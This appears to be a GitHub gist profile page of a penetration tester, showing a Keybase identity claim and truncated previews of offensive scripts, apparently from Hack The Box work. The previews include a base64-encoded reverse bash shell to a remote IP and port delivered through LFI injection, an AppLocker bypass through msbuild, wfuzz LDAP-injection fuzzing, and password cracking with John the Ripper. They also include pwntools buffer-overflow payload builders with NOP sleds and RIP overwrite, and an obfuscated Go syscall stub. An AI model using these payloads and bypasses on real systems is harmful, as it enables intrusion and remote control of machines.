I hereby claim:
- I am cdowns71 on github.
- I am dualfade (https://keybase.io/dualfade) on keybase.
- I have a public key ASDxw8oJN09Hj6abWb9Vc-BggpenCuRcRRWNa3j1r04UQwo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| #!/bin/bash | |
| # curl_post_LFI_Injection.sh | |
| # reverse nc bash shell -- | |
| # POST Data -- | |
| # --data-binary $"check=cXVhZ2dh" \ | |
| # ➜ echo "YjpcQXA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTIuNzQvMTMzNyAwPiYxCg==" | base64 -d | |
| # b:\Ap; bash -i >& /dev/tcp/10.10.12.74/1337 0>&1 | |
| # ~ |
| https://gist.githubusercontent.com/bcoles/421cc413d07cd9ba7855/raw/fd8b6f0d63f88c334beb45d2615c8097f06743b6/7zip-jtr.sh | |
| #!/bin/bash | |
| # 7zip-JTR Decrypt Script | |
| # | |
| # Clone of JTR Decrypt Scripts by synacl modified for 7zip | |
| # - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/ | |
| # - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/ | |
| echo "7zip-JTR Decrypt Script"; | |
| if [ $# -ne 2 ] |
| https://github.com/jpillora/chisel | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
| └[~/go/src/github.com/jpillora/chisel]> cd $GOPATH/src/github.com/jpillora/chisel | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
| └[~/go/src/github.com/jpillora/chisel]> go build | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
| └[~/go/src/github.com/jpillora/chisel]> ls -l chisel | |
| -rwxr-xr-x 1 cdowns cdowns 10539193 Jan 28 04:24 chisel* | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] |
| //Applocker bypass - Windows 2016 (Build 14393) x64 | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml | |
| //Microsoft (R) Build Engine version 4.6.1586.0 | |
| //[Microsoft .NET Framework, version 4.0.30319.42000] | |
| //Copyright (C) Microsoft Corporation. All rights reserved. | |
| //Build started 2/5/2019 8:55:26 PM. | |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> |
| ./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080 | |
| Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
| ******************************************************** | |
| * Wfuzz 2.3.4 - The Web Fuzzer * | |
| ******************************************************** | |
| Target: http://10.10.10.122/login.php | |
| Total requests: 2026 |
| /home/cdowns/Github/JohnTheRipper/run/./zip2john exploitme.zip > exploitme.john | |
| ver 2.0 efh 5455 efh 7875 exploitme.zip/membermanager PKZIP Encr: 2b chk, TS_chk, cmplen=3166, decmplen=10224, crc=32B64CF9 | |
| ver 2.0 efh 5455 efh 7875 exploitme.zip/memo PKZIP Encr: 2b chk, TS_chk, cmplen=3775, decmplen=13304, crc=FC9CDB4F | |
| NOTE: It is assumed that all files in each archive have the same password. | |
| If that is not the case, the hash may be uncrackable. To avoid this, use | |
| option -o to pick a file at a time. | |
| 4 CORE OPTINON -- | |
| NO POINT IN CRUSHING MY 8 CORES INO THE GROUND -- |
| #!usr/bin/env python | |
| import struct | |
| from pwn import * | |
| def gen_payload(start_addr, shellcode): | |
| context.arch='amd64' | |
| # Opcode for the NOP instruction | |
| nop = asm('nop', arch="amd64") | |
| nop1 = nop*72 # Create first NOP sled | |
| #!/usr/bin/env python | |
| from struct import * | |
| # bytes 400 -- | |
| buf = "" | |
| # offset to RIP | |
| buf += "A"*72 | |
| # overwrite RIP -- |
| package main | |
| import ( | |
| "encoding/binary" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| const ( | |
| lXMIZpS = 0x1000 |